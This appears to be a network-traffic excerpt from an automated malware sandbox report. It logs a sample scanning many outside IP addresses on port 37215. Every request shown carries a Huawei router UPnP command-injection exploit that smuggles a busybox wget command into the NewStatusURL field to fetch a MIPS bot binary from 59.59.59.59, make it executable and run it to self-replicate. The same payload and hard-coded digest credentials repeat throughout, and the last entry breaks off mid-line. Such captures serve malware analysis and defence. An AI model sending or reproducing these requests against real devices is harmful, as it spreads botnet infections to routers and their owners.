                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1834192.168.2.156084841.245.14.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979520082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1835192.168.2.154863441.245.189.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979536057 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1836192.168.2.155612241.101.126.20937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979559898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1837192.168.2.153526841.210.31.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979582071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1838192.168.2.154335441.201.158.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979605913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1839192.168.2.153415441.114.157.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979623079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1840192.168.2.155448490.80.240.5337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.979650021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1841192.168.2.154721841.191.76.16237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.988534927 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1842192.168.2.1538660197.183.223.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.988548994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1843192.168.2.1536820117.172.144.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:14.990227938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 